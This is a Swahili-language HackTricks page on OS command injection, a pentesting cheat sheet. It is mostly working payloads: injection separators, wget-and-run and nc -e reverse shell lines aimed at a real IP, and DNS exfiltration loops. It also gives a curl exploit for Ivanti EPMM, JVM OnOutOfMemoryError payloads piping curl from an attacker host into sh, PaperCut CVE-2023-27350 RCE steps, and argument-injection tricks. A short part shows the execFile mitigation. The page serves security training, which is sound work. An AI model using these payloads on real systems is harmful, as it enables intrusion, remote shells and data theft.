Command Injection

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Je, command Injection ni nini?

A command injection inaruhusu utekelezaji wa amri yoyote za operating system na mshambuliaji kwenye server inayohifadhi application. Kwa hivyo, application na data zake zote zinaweza kuathiriwa kabisa. Utekelezaji wa amri hizi kawaida humruhusu mshambuliaji kupata ufikiaji usioidhinishwa au udhibiti wa mazingira ya application na mfumo wa msingi.

Muktadha

Kulingana na mahali ambapo ingizo lako linaingizwa, unaweza kuhitaji kumaliza muktadha ulioko ndani ya nukuu (kutumia " au ') kabla ya amri.

Command Injection/Execution

#Both Unix and Windows supported
ls||id; ls ||id; ls|| id; ls || id # Execute both
ls|id; ls |id; ls| id; ls | id # Execute both (using a pipe)
ls&&id; ls &&id; ls&& id; ls && id #  Execute 2º if 1º finish ok
ls&id; ls &id; ls& id; ls & id # Execute both but you can only see the output of the 2º
ls %0A id # %0A Execute both (RECOMMENDED)
ls%0abash%09-c%09"id"%0a   # (Combining new lines and tabs)

#Only unix supported
`ls` # ``
$(ls) # $()
ls; id # ; Chain commands
ls${LS_COLORS:10:1}${IFS}id # Might be useful

#Not executed but may be interesting
> /var/www/html/out.txt #Try to redirect the output to a file
< /etc/passwd #Try to send some input to the command

Limition Bypasses

Ikiwa unajaribu kutekeleza arbitrary commands inside a linux machine, utavutiwa kusoma kuhusu hizi Bypasses:

Bypass Linux Restrictions

Mifano

vuln=127.0.0.1 %0a wget https://web.es/reverse.txt -O /tmp/reverse.php %0a php /tmp/reverse.php
vuln=127.0.0.1%0anohup nc -e /bin/bash 51.15.192.49 80
vuln=echo PAYLOAD > /tmp/pay.txt; cat /tmp/pay.txt | base64 -d > /tmp/pay; chmod 744 /tmp/pay; /tmp/pay

Bash tathmini ya kihesabu katika RewriteMap/CGI-style scripts

RewriteMap helpers uliyoandikwa kwa bash wakati mwingine hutuma query params kwenye globals kisha kuzikagua baadaye katika arithmetic contexts ([[ $a -gt $b ]], $((...)), let). Upanuzi wa arithmetic huunda tena tokens za maudhui, hivyo majina ya variable yanayodhibitiwa na mshambuliaji au references za array yanapanuliwa mara mbili na yanaweza kutekelezwa.

Mfano ulioonekana katika Ivanti EPMM RewriteMap helpers:

  1. Params zinawekwa kwenye globals (stgStartTime, htheValue).
  2. Baadaye hupimwa:
if [[ ${theCurrentTimeSeconds} -gt ${gStartTime} ]]; then
...
fi
  1. Tuma st=theValue ili gStartTime ianze kuelekeza kwenye string theValue.
  2. Tuma h=gPath['sleep 5'] ili theValue ibebe index ya array; wakati wa ukaguzi wa kihesabu itafanya sleep 5 (badilisha kwa payload halisi).

Jaribio (~5s kuchelewesha kisha 404 ikiwa dhaifu):

curl -k "https://TARGET/mifs/c/appstore/fob/ANY?st=theValue&h=gPath['sleep 5']"

Maelezo:

  • Tafuta helper sawa chini ya prefixes nyingine (e.g., /mifs/c/aftstore/fob/).
  • Muktadha wa kihesabu hutendea token zisizojulikana kama vitambulishi vya variable/array, hivyo hii inavuka vichujio rahisi vya metacharacter.

Vigezo

Hapa kuna vigezo 25 vya juu ambavyo vinaweza kuwa dhaifu kwa code injection na udhaifu sawa za RCE (from link):

?cmd={payload}
?exec={payload}
?command={payload}
?execute{payload}
?ping={payload}
?query={payload}
?jump={payload}
?code={payload}
?reg={payload}
?do={payload}
?func={payload}
?arg={payload}
?option={payload}
?load={payload}
?process={payload}
?step={payload}
?read={payload}
?function={payload}
?req={payload}
?feature={payload}
?exe={payload}
?module={payload}
?payload={payload}
?run={payload}
?print={payload}

Time based data exfiltration

Kuchota data: char kwa char

swissky@crashlab▸ ~ ▸ $ time if [ $(whoami|cut -c 1) == s ]; then sleep 5; fi
real    0m5.007s
user    0m0.000s
sys 0m0.000s

swissky@crashlab▸ ~ ▸ $ time if [ $(whoami|cut -c 1) == a ]; then sleep 5; fi
real    0m0.002s
user    0m0.000s
sys 0m0.000s

DNS iliyotegemea data exfiltration

Inatokana na zana kutoka kwa https://github.com/HoLyVieR/dnsbin pia inapatikana kwenye dnsbin.zhack.ca

1. Go to http://dnsbin.zhack.ca/
2. Execute a simple 'ls'
for i in $(ls /) ; do host "$i.3a43c7e4e57a8d0e2057.d.zhack.ca"; done

$(host $(wget -h|head -n1|sed 's/[ ,]/-/g'|tr -d '.').sudo.co.il)

Zana za mtandaoni za kukagua uhamishaji wa data kupitia DNS:

  • dnsbin.zhack.ca
  • pingb.in

Kupitisha uchujaji

Windows

powershell C:**2\n??e*d.*? # notepad
@^p^o^w^e^r^shell c:**32\c*?c.e?e # calc

Linux

Bypass Linux Restrictions

Node.js child_process.exec vs execFile

Unapokagua back-ends za JavaScript/TypeScript, mara nyingi utakutana na Node.js child_process API.

// Vulnerable: user-controlled variables interpolated inside a template string
const { exec } = require('child_process');
exec(`/usr/bin/do-something --id_user ${id_user} --payload '${JSON.stringify(payload)}'`, (err, stdout) => {
/* … */
});

exec() huanzisha shell (/bin/sh -c), kwa hivyo alama yoyote ambayo ina maana maalum kwa shell (back-ticks, ;, &&, |, $(), …) itasababisha command injection wakati pembejeo ya mtumiaji inapoambatanishwa ndani ya string.

Mitigation: tumia execFile() (au spawn() bila chaguo la shell) na toa kila argument kama kipengele tofauti cha array ili shell isihusishwe:

const { execFile } = require('child_process');
execFile('/usr/bin/do-something', [
'--id_user', id_user,
'--payload', JSON.stringify(payload)
]);

Mfano halisi: Synology Photos ≤ 1.7.0-0794 ulikuwa unaweza kutumiwa kupitia tukio la WebSocket lisilo na uthibitisho ambalo liliweka data iliyodhibitiwa na mshambuliaji ndani ya id_user, ambayo baadaye ilingizwa katika wito la exec(), ikifanikisha RCE (Pwn2Own Ireland 2024).

Argument/Option injection via leading hyphen (argv, no shell metacharacters)

Sio uingizaji wote unaohitaji shell metacharacters. Ikiwa programu inapitisha mistari isiyotegemewa kama vigezo kwa utility ya mfumo (hata na execve/execFile na bila shell), programu nyingi bado zitatafsiri kigezo chochote kinachoanza na - au -- kama chaguo. Hii inampa mshambuliaji uwezo wa kubadili mode, kubadilisha njia za pato, au kusababisha tabia hatari bila hata kuingia kwenye shell.

Sehemu za kawaida ambapo hili huonekana:

  • Embedded web UIs/CGI handlers ambazo hujenga amri kama ping <user>, tcpdump -i <iface> -w <file>, curl <url>, etc.
  • Centralized CGI routers (mf., /cgi-bin/<something>.cgi na parameter ya selector kama topicurl=<handler>) ambapo handlers nyingi zinatumia validator dhaifu sawa.

Kile cha kujaribu:

  • Toa thamani zinazoanza na -/-- zitakazotumika kama flags na zana inayofuata.
  • Tumia vibaya flags ambazo hubadilisha tabia au kuandika files, kwa mfano:
  • ping: -f/-c 100000 kuongeza mzigo kwenye kifaa (DoS)
  • curl: -o /tmp/x kuandika njia yoyote, -K <url> kupakia config inayodhibitiwa na mshambuliaji
  • tcpdump: -G 1 -W 1 -z /path/script.sh kupata utekelezaji baada ya post-rotate katika wrappers zisizo salama
  • Ikiwa programu inasaidia -- end-of-options, jaribu kuvuka mitigations za naive ambazo zinaweka -- mahali pasipo sahihi.

Mifano ya Generic PoC dhidi ya centralized CGI dispatchers:

POST /cgi-bin/cstecgi.cgi HTTP/1.1
Content-Type: application/x-www-form-urlencoded

# Flip options in a downstream tool via argv injection
topicurl=<handler>&param=-n

# Unauthenticated RCE when a handler concatenates into a shell
topicurl=setEasyMeshAgentCfg&agentName=;id;

JVM diagnostic callbacks kwa utekelezaji uliothibitishwa

Kila primitive inayokuruhusu kuingiza JVM command-line arguments (_JAVA_OPTIONS, launcher config files, AdditionalJavaArguments fields in desktop agents, etc.) inaweza kugeuzwa kuwa RCE imara bila kugusa application bytecode:

  1. Lazimisha crash inayotabirika kwa kupunguza metaspace au heap: -XX:MaxMetaspaceSize=16m (au -Xmx ndogo). Hii inahakikisha OutOfMemoryError hata wakati wa bootstrap ya mapema.
  2. Ambatisha error hook: -XX:OnOutOfMemoryError="<cmd>" au -XX:OnError="<cmd>" hufanya command yoyote ya OS itekelezwe kila wakati JVM inapokoma.
  3. Hiari ongeza -XX:+CrashOnOutOfMemoryError ili kuepuka jaribio la urejeshaji na kufanya payload iwe one-shot.

Example payloads:

-XX:MaxMetaspaceSize=16m -XX:OnOutOfMemoryError="cmd.exe /c powershell -nop -w hidden -EncodedCommand <blob>"
-XX:MaxMetaspaceSize=12m -XX:OnOutOfMemoryError="/bin/sh -c 'curl -fsS https://attacker/p.sh | sh'"

Kwa sababu diagnostics hizi zinachambuliwa na JVM yenyewe, hakuna shell metacharacters yanayohitajika na amri inaendeshwa kwa ngazi ile ile ya uadilifu kama launcher. Desktop IPC bugs zinazopitisha user-supplied JVM flags (see Localhost WebSocket abuse) zinaweza kutafsiriwa moja kwa moja kuwa OS command execution.

PaperCut NG/MF SetupCompleted auth bypass -> print scripting RCE

  • NG/MF builds zilizo dhaifu (mfano, 22.0.5 Build 63914) zinafichua /app?service=page/SetupCompleted; kuzurura hapo na kubofya Login hurudisha JSESSIONID halali bila nyaraka za kuingia (authentication bypass in the setup flow).
  • Katika Options → Config Editor, weka print-and-device.script.enabled=Y na print.script.sandboxed=N ili kuwasha printer scripting na kuzima sandbox.
  • Kwenye tab ya Scripting ya printer, wezesha script na uache printJobHook ikifafanuliwa ili kuepuka makosa ya uthibitisho, lakini weka payload nje ya function ili itekelezwe mara moja unapobofya Apply (hakuna print job inahitajika):
function printJobHook(inputs, actions) {}
cmd = ["bash","-c","curl http://attacker/hit"];
java.lang.Runtime.getRuntime().exec(cmd);
  • Badilisha callback kwa reverse shell; ikiwa UI/PoC haiwezi kushughulikia pipes/redirects, stage payload yenye amri moja kisha exec kwa request ya pili.
  • Horizon3’s CVE-2023-27350.py automates the auth bypass, config flips, command execution, and rollback—run it through an upstream proxy (e.g., proxychains → Squid) when the service is only reachable internally.

Orodha ya Ugunduzi ya Brute-Force

https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/command_injection.txt

Marejeleo

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks